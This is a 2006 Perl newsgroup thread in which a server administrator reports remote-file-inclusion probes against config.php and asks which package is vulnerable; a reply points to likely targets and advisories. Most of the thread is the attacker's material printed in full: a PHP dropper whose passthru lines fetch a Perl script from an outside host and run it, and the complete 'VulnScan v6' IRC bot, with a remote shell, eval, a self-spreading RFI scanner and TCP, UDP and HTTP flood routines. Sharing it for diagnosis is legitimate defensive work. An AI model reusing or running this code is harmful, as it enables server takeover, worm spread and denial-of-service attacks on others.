PHP/Perl/Unix Virus: delete config.php files asap

Discussion in 'Perl Misc' started by Ignoramus6539, Aug 30, 2006.

  1. There were some strange requests to my server asking for config.php
    file (which I do not have in the requested location).

    I did some investigation. Seems to be a virus written in perl,
    exploiting a vulnerability in php code.

    The requests are like this

    216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"

    File spread.txt contains this:

    <?
    passthru('cd /tmp;wget http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;curl -O http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;lwp-download http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;lynx -source http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;fetch http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;GET http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
    ?>

    That script, obviously, tries very hard to download and execute 'tmr'.

    'tmr' is, apparently, a perl script whose job SEEMS to be to listen on
    IRC channels or some such and spread around by abusing a vulnerability
    in 'config.php'. It is also seemingly used for DDOSing some servers
    and who knows what else (shell function etc).

    If the guy was smart, he's probably run some obfuscator on his code,
    to make it harder to read.

    I did a locate command on my fedora systems and found config.php in
    some package called 'squirrelmail'. Which I immediately deleted, even
    though it was not accessible through the web, just sitting there, but
    I just do not want it.

    My main question is, just what package or program owns config.php that
    si vulnerable. It is a generic file name, so I would not be so quick
    to suspect squirrelmail.

    Here's the 'tmr' script:

    #!/usr/bin/perl

    # VulnScan v6 Stable By Morgan
    #
    # Note:
    # DO NOT REMOVE COPYRIGHTS ...
    # www.priv8.com.ar
    #
    # [Morgan]: http://priv8.com.ar/Zerocool.jpg
    # [Morgan]: u got owned
    # [ZEROCOOL]: bro
    # [ZEROCOOL]: it's a rbot
    # [ZEROCOOL]: i'm not fuckingstupid
    # [ZEROCOOL]: uahuahuahuahua
    #
    #
    # Greets to irc.gigachat.net :: #Morgan
    #
    #
    # To work with auto-spread :
    # Create a file named spread.txt with this :
    #
    # <?
    # passthru('cd /tmp;wget http://priv8.com.ar/v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;curl -O http://priv8.com.ar/v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;lwp-download http://priv8.com.ar/v6;perl v6.txt;rm -f v6*');
    # passthru('cd /tmp;lynx -source http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;fetch http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;GET http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
    # ?>
    #
    # Change the url .. put ur bot url in that file
    # then use the command :
    #
    # !morgan !eval @cmdstring='http://yoursite.com/spread.txt';
    # or directly change it from the code..
    #
    # Enjoy the bot ....
    # /Morgan


    my $processo = '[sys]';
    use HTTP::Request;
    use LWP::UserAgent;

    #CONFIGURATION
    my $linas_max='4';
    my $sleep='5';
    my @gstring='www.priv8.com.ar';
    my @cmdstring='http://domates.1gig.biz/spread.txt';
    my @adms=("h1dd3n","Tamer");
    my @canais=("#tamerlinux");
    my $nick='Linux-';
    my $ircname ='linux';
    chop (my $realname = `uname -a`);
    $servidor='h1dd3n.pikolata.net' unless $servidor;
    my $porta='6121';
    my $VERSAO = 'Vulnscan v6 www.priv8.com.ar';
    $SIG{'INT'} = 'IGNORE';
    $SIG{'HUP'} = 'IGNORE';
    $SIG{'TERM'} = 'IGNORE';
    $SIG{'CHLD'} = 'IGNORE';
    $SIG{'PS'} = 'IGNORE';
    use IO::Socket;
    use Socket;
    use IO::Select;
    chdir("/");
    $servidor="$ARGV[0]" if $ARGV[0];
    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);


    our %irc_servers;
    our %DCC;
    my $dcc_sel = new IO::Select->new();

    $sel_cliente = IO::Select->new();
    sub sendraw {
    if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
    print $IRC_cur_socket "$_[0]\n";
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);

    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;
    }
    }
    my $line_temp;
    while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
    $sel_cliente->remove($fh);
    $fh->close;
    delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);

    for(my $c=0; $c<= $#lines; $c++) {
    $line = $lines[$c];
    $line=$line_temp.$line if ($line_temp);
    $line_temp='';
    $line =~ s/\r$//;
    unless ($c == $#lines) {
    parse("$line");
    } else {
    if ($#lines == 0) {
    parse("$line");
    } elsif ($lines[$c] =~ /\r$/) {
    parse("$line");
    } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
    parse("$line");
    } else {
    $line_temp = $line;
    }
    }
    }
    }
    }

    sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
    notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
    }
    if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
    if ($onde eq "$meunick"){
    shell("$pn", "$args");
    }
    if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
    my $natrix = $1;
    my $arg = $2;
    if ($arg =~ /^\!(.*)/) {
    ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
    } elsif ($arg =~ /^\@(.*)/) {
    $ondep = $onde;
    $ondep = $pn if $onde eq $meunick;
    bfunc("$ondep","$1");
    } else {
    shell("$onde", "$arg");
    }
    }
    }
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
    if (lc($1) eq lc($meunick)) {
    $meunick=$4;
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
    nick("$meunick|".int rand(999999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
    $meunick = $2;
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
    foreach my $canal (@canais) {
    sendraw("JOIN $canal ddosit");
    }
    }
    }

    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub bfunc {
    my $printl = $_[0];
    my $funcarg = $_[1];
    if (my $pid = fork) {
    waitpid($pid, 0);
    } else {
    if (fork) {
    exit;
    } else {
    if ($funcarg =~ /^portscan (.*)/) {
    my $hostip="$1";
    my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
    my (@aberta, %porta_banner);
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
    foreach my $porta (@portas) {
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
    if ($scansock) {
    push (@aberta, $porta);
    $scansock->close;
    }
    }

    if (@aberta) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
    } else {
    sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
    }
    }
    if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
    my $itime = time;
    my ($cur_time);
    $cur_time = time - $itime;
    while ($3>$cur_time){
    $cur_time = time - $itime;
    &tcpflooder("$1","$2","$3");
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attack done ".$1.":".$2.".");
    }
    if ($funcarg =~ /^version/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
    }
    #SCANNER
    if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
    $boturl=$2;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6]\002 Scan started.");
    srand;
    my $itime = time;
    my ($cur_time);
    my ($exploited);
    $boturl=$2;
    $cur_time = time - $itime;$exploited = 0;
    while($1>$cur_time){
    $cur_time = time - $itime;
    @urls=fetch();
    foreach $url (@urls) {
    $cur_time = time - $itime;
    #sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[v6|Exploiting]\002 ".$url2."\n\n");
    my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
    $url2 ="http://".$path."/".$boturl."@cmdstring?";

    print "\n".$url2."\n\n";


    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan

    my $req=HTTP::Request->new(GET=>$url2);
    my $ua=LWP::UserAgent->new();
    $ua->timeout(10);
    my $response=$ua->request($req);

    if ($response->is_success) {
    if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6|VULN]\002 ".$url2." \n\n");
    }
    }
    else {
    print 'Errore: ',$path,$response->status_line, "\n";
    }
    }
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6]\002 Scan finished in ".$1." seconds.");
    }
    if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP DDoSing]\002 Attacking ".$1.":80 for ".$2." seconds.");
    my $itime = time;
    my ($cur_time);
    $cur_time = time - $itime;
    while ($2>$cur_time){
    $cur_time = time - $itime;
    my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
    print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
    close($socket);
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
    }
    if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP DDoSing]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
    my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
    $dtime = 1 if $dtime == 0;
    my %bytes;
    $bytes{igmp} = $2 * $pacotes{igmp};
    $bytes{icmp} = $2 * $pacotes{icmp};
    $bytes{o} = $2 * $pacotes{o};
    $bytes{udp} = $2 * $pacotes{udp};
    $bytes{tcp} = $2 * $pacotes{tcp};
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
    }
    exit;
    }
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub ircase {
    my ($kem, $printl, $case) = @_;

    if ($case =~ /^join (.*)/) {
    j("$1");
    }
    if ($case =~ /^part (.*)/) {
    p("$1");
    }
    if ($case =~ /^rejoin\s+(.*)/) {
    my $chan = $1;
    if ($chan =~ /^(\d+) (.*)/) {
    for (my $ca = 1; $ca <= $1; $ca++ ) {
    p("$2");
    j("$2");
    }
    } else {
    p("$chan");
    j("$chan");
    }
    }
    if ($case =~ /^op/) {
    op("$printl", "$kem") if $case eq "op";
    my $oarg = substr($case, 3);
    op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^deop/) {
    deop("$printl", "$kem") if $case eq "deop";
    my $oarg = substr($case, 5);
    deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^msg\s+(\S+) (.*)/) {
    msg("$1", "$2");
    }
    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
    for (my $cf = 1; $cf <= $1; $cf++) {
    msg("$2", "$3");
    }
    }
    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
    ctcp("$1", "$2");
    }
    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
    for (my $cf = 1; $cf <= $1; $cf++) {
    ctcp("$2", "$3");
    }
    }
    if ($case =~ /^nick (.*)/) {
    nick("$1");
    }
    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
    conectar("$2", "$1", 6667);
    }
    if ($case =~ /^raw (.*)/) {
    sendraw("$1");
    }
    if ($case =~ /^eval (.*)/) {
    eval "$1";
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub shell {
    my $printl=$_[0];
    my $comando=$_[1];
    if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
    }
    elsif ($pid = fork) {
    waitpid($pid, 0);
    } else {
    if (fork) {
    exit;
    } else {
    my @resp=`$comando 2>&1 3>&1`;
    my $c=0;
    foreach my $linha (@resp) {
    $c++;
    chop $linha;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
    if ($c == "$linas_max") {
    $c=0;
    sleep $sleep;
    }
    }
    exit;
    }
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub tcpflooder {
    my $itime = time;
    my ($cur_time);
    my ($ia,$pa,$proto,$j,$l,$t);
    $ia=inet_aton($_[0]);
    $pa=sockaddr_in($_[1],$ia);
    $ftime=$_[2];
    $proto=getprotobyname('tcp');
    $j=0;$l=0;
    $cur_time = time - $itime;
    while ($l<1000){
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    $t="SOCK$l";
    socket($t,PF_INET,SOCK_STREAM,$proto);
    connect($t,$pa)||$j--;
    $j++;$l++;
    }
    $l=0;
    while ($l<1000){
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    $t="SOCK$l";
    shutdown($t,2);
    $l++;
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub udpflooder {
    my $iaddr = inet_aton($_[0]);
    my $msg = 'A' x $_[1];
    my $ftime = $_[2];
    my $cp = 0;
    my (%pacotes);
    $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

    socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

    socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
    socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
    socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
    return(undef) if $cp == 4;
    my $itime = time;
    my ($cur_time);
    while ( 1 ) {
    for (my $porta = 1; $porta <= 65000; $porta++) {
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
    send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
    send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
    send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

    for (my $pc = 3; $pc <= 255;$pc++) {
    next if $pc == 6;
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
    send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
    }
    }
    last if $cur_time >= $ftime;
    }
    return($cur_time, %pacotes);
    }

    sub ctcp {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
    }
    sub msg {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :$_[1]");
    }
    sub notice {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
    }
    sub op {
    return unless $#_ == 1;
    sendraw("MODE $_[0] +o $_[1]");
    }
    sub deop {
    return unless $#_ == 1;
    sendraw("MODE $_[0] -o $_[1]");
    }
    sub j { &join(@_); }
    sub join {
    return unless $#_ == 0;
    sendraw("JOIN $_[0]");
    }
    sub p { part(@_); }
    sub part {
    sendraw("PART $_[0]");
    }
    sub nick {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
    }
    sub quit {
    sendraw("QUIT :$_[0]");
    }

    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan

    sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);
    {
    my @dominios = ("nodom");
    my @str;

    foreach $dom (@dominios)
    {
    push (@str,"@gstring");
    }

    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";
    my @lst=();
    #sendraw("privmsg #Morgan :DEBUG only test googling: ".$query."");
    my $page = http_query($query);
    while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
    if ($1 !~ m/google|cache|translate/){
    push (@lst,$1);
    }
    }
    return (@lst);
    }

    sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
    local $SIG{ALRM} = sub { die "1";};
    alarm 10;
    my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
    print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
    my @r = <$sock>;
    $page="@r";
    alarm 0;
    close($sock);
    };

    return $page;
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan

    # NOTE: DONT REMOVE COPYRIGHTS
     
    Ignoramus6539, Aug 30, 2006
    #1
    1. Advertising

  2. Ignoramus6539 wrote:

    > There were some strange requests to my server asking for config.php
    > file (which I do not have in the requested location).
    >


    Nice one Ignoramus6539

    > I did some investigation. Seems to be a virus written in perl,
    > exploiting a vulnerability in php code.
    >


    Sure looks like it. Is anyone daft enough to include($get_parameter)?

    > I did a locate command on my fedora systems and found config.php in
    > some package called 'squirrelmail'. Which I immediately deleted, even
    > though it was not accessible through the web, just sitting there, but
    > I just do not want it.
    >

    Oooh. "Some package called...' sloppy housekeeping!

    Actually, although Squirrelmail was vulnerable to this kind of attack
    (http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
    http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
    the developers are relatively good about releasing fixes.

    Your attacker seems to be looking for phpListPro
    (http://www.frsirt.com/english/advisories/2006/1325).

    Usually script kiddies don't look to see what you're running before
    unleashing all their dogs on your servers.

    > My main question is, just what package or program owns config.php that
    > si vulnerable. It is a generic file name, so I would not be so quick
    > to suspect squirrelmail.
    >

    Next time try Google first :) and give us a URL for the code.

    C.
     
    Colin McKinnon, Aug 30, 2006
    #2
    1. Advertising

  3. Colin McKinnon wrote:

    > Ignoramus6539 wrote:
    >

    Whoops - sorry for cross-posting the reply too.

    (rec.crafts.metalworking????)

    C.
     
    Colin McKinnon, Aug 30, 2006
    #3
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. dpackwood
    Replies:
    3
    Views:
    1,832
  2. Aalok
    Replies:
    1
    Views:
    307
    Tim Hagan
    Sep 17, 2004
  3. ctrl+alt+delete

    Perl Newbie Needs Help ASAP!

    ctrl+alt+delete, May 14, 2007, in forum: Perl
    Replies:
    0
    Views:
    2,339
    ctrl+alt+delete
    May 14, 2007
  4. Rajive Narain
    Replies:
    0
    Views:
    1,996
    Rajive Narain
    Sep 18, 2009
  5. Robert Wallace

    my own perl "dos->unix"/"unix->dos"

    Robert Wallace, Jan 21, 2004, in forum: Perl Misc
    Replies:
    7
    Views:
    298
    Michele Dondi
    Jan 22, 2004
Loading...

Share This Page